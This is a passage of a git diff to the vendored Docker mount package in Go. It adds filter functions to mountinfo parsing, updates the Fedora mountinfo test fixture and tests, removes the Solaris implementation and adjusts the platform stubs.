In here we ignore + // those "extra" fields caused by extra spaces. + p.Fstype = fields[i+1] + p.Source = fields[i+2] + p.VfsOpts = fields[i+3] - p.Fstype = postSeparatorFields[0] - p.Source = postSeparatorFields[1] - p.VfsOpts = strings.Join(postSeparatorFields[2:], " ") out = append(out, p) + if stop { + break + } } return out, nil } +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts +func parseMountTable(filter FilterFunc) ([]*Info, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f, filter) +} + // PidMountInfo collects the mounts for a specific process ID. If the process // ID is unknown, it is better to use `GetMounts` which will inspect // "/proc/self/mountinfo" instead. @@ -91,5 +128,5 @@ func PidMountInfo(pid int) ([]*Info, error) { } defer f.Close() - return parseInfoFile(f) + return parseInfoFile(f, nil) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go index bd100e1d49..64411ccaef 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go @@ -1,71 +1,73 @@ // +build linux -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "bytes" "testing" + + "gotest.tools/assert" ) const ( fedoraMountinfo = `15 35 0:3 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw - 16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel - 17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 - 18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw - 19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw - 20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs 
rw,seclabel - 21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 - 22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 - 23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 - 24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd - 25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw - 26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children - 27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children - 28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children - 29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children - 30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children - 31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children - 32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children - 33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children - 34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children - 35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered - 36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct - 37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel - 38 35 0:31 / 
/tmp rw shared:24 - tmpfs tmpfs rw,seclabel - 39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel - 40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw - 41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw - 42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw - 43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw - 45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered - 46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered - 47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered - 48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered - 121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 - 124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw - 165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered - 167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered - 171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered - 175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 
/dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered - 179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered - 183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered - 187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered - 191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered - 195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered - 199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered - 203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - 
ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered - 207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered - 211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered - 215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered - 219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered - 223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered - 227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered - 231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 
- ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered - 235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered - 239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered - 243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered - 247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered - 31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` +16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel +17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 +18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw +19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw +20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel +21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime 
shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 +22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 +23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 +24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd +25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw +26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children +27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children +28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children +29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children +30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children +31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children +32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children +33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children +34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children +35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered +36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct +37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel +38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel +39 17 0:32 / /dev/hugepages 
rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel +40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw +41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw +42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw +43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw +45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered +46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered +47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered +48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered +121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 +124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw +165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered +167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered +171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered +175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered +179 35 253:18 / 
/var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered +183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered +187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered +191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered +195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered +199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered +203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered +207 35 253:25 / 
/var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered +211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered +215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered +219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered +223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered +227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered +231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered +235 35 253:32 / 
/var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered +239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered +243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered +247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered +31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` ubuntuMountInfo = `15 20 0:14 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw 16 20 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw @@ -424,7 +426,7 @@ const ( func TestParseFedoraMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(fedoraMountinfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -432,7 +434,7 @@ func TestParseFedoraMountinfo(t *testing.T) { func TestParseUbuntuMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(ubuntuMountInfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -440,7 +442,7 @@ func TestParseUbuntuMountinfo(t 
*testing.T) { func TestParseGentooMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(gentooMountinfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -448,7 +450,7 @@ func TestParseGentooMountinfo(t *testing.T) { func TestParseFedoraMountinfoFields(t *testing.T) { r := bytes.NewBuffer([]byte(fedoraMountinfo)) - infos, err := parseInfoFile(r) + infos, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -474,3 +476,33 @@ func TestParseFedoraMountinfoFields(t *testing.T) { t.Fatalf("expected %#v, got %#v", mi, infos[0]) } } + +func TestParseMountinfoFilters(t *testing.T) { + r := bytes.NewReader([]byte(fedoraMountinfo)) + + infos, err := parseInfoFile(r, SingleEntryFilter("/sys/fs/cgroup")) + assert.NilError(t, err) + assert.Equal(t, 1, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, SingleEntryFilter("nonexistent")) + assert.NilError(t, err) + assert.Equal(t, 0, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, PrefixFilter("/sys")) + assert.NilError(t, err) + // there are 18 entries starting with /sys in fedoraMountinfo + assert.Equal(t, 18, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, PrefixFilter("nonexistent")) + assert.NilError(t, err) + assert.Equal(t, 0, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, ParentsFilter("/sys/fs/cgroup/cpu,cpuacct")) + assert.NilError(t, err) + // there should be 4 results returned: /sys/fs/cgroup/cpu,cpuacct /sys/fs/cgroup /sys / + assert.Equal(t, 4, len(infos)) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go deleted file mode 100644 index ad9ab57f8b..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build solaris,cgo - -package mount - -/* -#include -#include -*/ -import "C" - 
-import ( - "fmt" -) - -func parseMountTable() ([]*Info, error) { - mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r")) - if mnttab == nil { - return nil, fmt.Errorf("Failed to open %s", C.MNTTAB) - } - - var out []*Info - var mp C.struct_mnttab - - ret := C.getmntent(mnttab, &mp) - for ret == 0 { - var mountinfo Info - mountinfo.Mountpoint = C.GoString(mp.mnt_mountp) - mountinfo.Source = C.GoString(mp.mnt_special) - mountinfo.Fstype = C.GoString(mp.mnt_fstype) - mountinfo.Opts = C.GoString(mp.mnt_mntopts) - out = append(out, &mountinfo) - ret = C.getmntent(mnttab, &mp) - } - - C.fclose(mnttab) - return out, nil -} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go index 7fbcf19214..fd16d3ed69 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go @@ -1,12 +1,12 @@ -// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo +// +build !windows,!linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "fmt" "runtime" ) -func parseMountTable() ([]*Info, error) { +func parseMountTable(f FilterFunc) ([]*Info, error) { return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go index dab8a37ed0..27e0f6976e 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go @@ -1,6 +1,6 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" -func parseMountTable() ([]*Info, error) { +func parseMountTable(f FilterFunc) ([]*Info, error) { // Do NOT return an error! 
